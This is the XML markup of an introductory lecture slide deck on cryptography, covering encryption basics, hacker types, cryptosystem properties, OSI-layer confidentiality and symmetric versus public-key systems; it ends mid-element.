              <a:ext cx="1134" cy="272"/>
              <a:chOff x="1610" y="2997"/>
              <a:chExt cx="1134" cy="272"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="44" name="AutoShape 27"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1610"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eaLnBrk="0" fontAlgn="base" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPct val="90000"/>
                  </a:lnSpc>
                  <a:spcBef>
                    <a:spcPct val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPct val="0"/>
                  </a:spcAft>
                </a:pPr>
                <a:endParaRPr lang="de-DE" sz="3000" b="1">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="45" name="Text Box 37"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1655" y="3042"/>
                <a:ext cx="10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90000"/>
                  </a:lnSpc>
                  <a:spcBef>
                    <a:spcPct val="50000"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPct val="0"/>
                  </a:spcAft>
                </a:pPr>
                <a:r>
                  <a:rPr lang="de-DE" sz="1400" b="1">
                    <a:solidFill>
                      <a:prstClr val="black"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Stream Ciphers</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40" name="Line 45"/>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41" name="Line 51"/>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42" name="Line 52"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="Line 53"/>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pPr eaLnBrk="0" fontAlgn="base" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="3000" b="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="238081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smtClean="0"/>
              <a:t>What is Cryptography?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25602" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>Cryptography means “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hidden writing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Encryption</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t> is coding a message in such a way that its meaning is concealed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Decryption</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t> is the process of transforming an encrypted message into its original form</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>Plaintext is a message in its original form</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>Ciphertext is a message in its encrypted form</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="424352047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dirty="0" smtClean="0"/>
              <a:t>Beware of Overconfidence</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35842" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="455613" y="1676400"/>
            <a:ext cx="8224837" cy="4252912"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Simply using popular cryptographic algorithms, with large key lengths, does not make your system secure.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>You must protect your key!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cryptanalytic compromises usually originate from totally unexpected places.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="178677246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de-DE" smtClean="0"/>
              <a:t>Some Basic Facts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21509" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>Ancient Crypto: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Early signs of encryption in Eqypt in ca. 2000 B.C. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-DE" sz="2000" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Letter-based encryption schemes (e.g., Caesar cipher) popular ever since.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>Symmetric ciphers:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" smtClean="0"/>
              <a:t> All encryption schemes from ancient times until 1976 were symmetric ones.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>Asymmetric ciphers:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" smtClean="0"/>
              <a:t> In 1976 public-key (or asymmetric) cryptography was openly proposed by Diffie, Hellman and Merkle.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>Hybrid Schemes:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" smtClean="0"/>
              <a:t> The majority of today‘s protocols are hybrid scheme</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" smtClean="0"/>
              <a:t>symmteric ciphers (for encryption and message authentication)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" smtClean="0"/>
              <a:t>asymmetric ciphers (for key exchange and digital signature).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="de-DE" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="246186747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5800" y="457200"/>
            <a:ext cx="7772040" cy="990360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="A50021"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Georgia"/>
              </a:rPr>
              <a:t>Types of Hackers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1752480"/>
            <a:ext cx="7772040" cy="4343040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>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Black hats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Individuals with extraordinary computing skills, resorting to malicious or destructive activities.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Known as ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Crackers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>.’</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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White Hats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Individuals professing hacker skills and using them for defensive purposes.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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 Known as ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Security Analysts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>’.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="004666"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="800000"/>
              </a:buClr>
              <a:buFont typeface="Symbol"/>
              <a:buChar char="à"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Gray Hats</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="004666"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="743040" lvl="1" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="800000"/>
              </a:buClr>
              <a:buFont typeface="Symbol"/>
              <a:buChar char="à"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Individuals who work both offensively and defensively at various times.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="004666"/>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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Protocols</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Algorithms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Example: PGP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23271867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the Cryptosystem</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1447800"/>
            <a:ext cx="7772400" cy="4343400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Resistant to cryptographic attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The algorithm is secure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Support variable and long key lengths and scalability.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Large key-space; harder to brute force</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Create an avalanche effect.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Changing few bits in plain text generates completely different cipher text</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Have no export or import restrictions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Confusion and Diffusion</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38408684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spect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Confidentiality and the OSI Model</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54275" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>For Network Layer confidentiality, use secure Network Layer protocols such as the IPsec protocol suite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>For Session Layer confidentiality, use  protocols such as Secure Sockets Layer (SSL) or Transport Layer Security (TLS) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>For Application Layer confidentiality, use secure e-mail, secure database sessions (Oracle SQL*net)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24697591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Selecting an Encryption Algorithm</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Trust in the algorithm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>cryptographic community</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protection against </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>brute-force attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Large </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>key space</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9890904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dirty="0" smtClean="0"/>
              <a:t>Types of Cryptosystems</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76802" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Secret key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Symmetric</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Single or 1-key encryption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Public</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Asymmetric</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Dual or 2-key encryption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>One-way transformation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="86552838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dirty="0" smtClean="0"/>
              <a:t>Symmetric Key Cryptosystems</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78850" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>"Secret-Key" Encryption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0"/>
              <a:t>Fast! Single key for encryption and decryption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0"/>
              <a:t>Requires secure key distribution channel (scalability)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0"/>
              <a:t>No technical non-repudiation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Requires a secure channel:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Pre-shared key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Asymmetric encryption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Diffie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>-Hellman key exchange</a:t>
            </a:r>
          </a:p>
          <a:p>
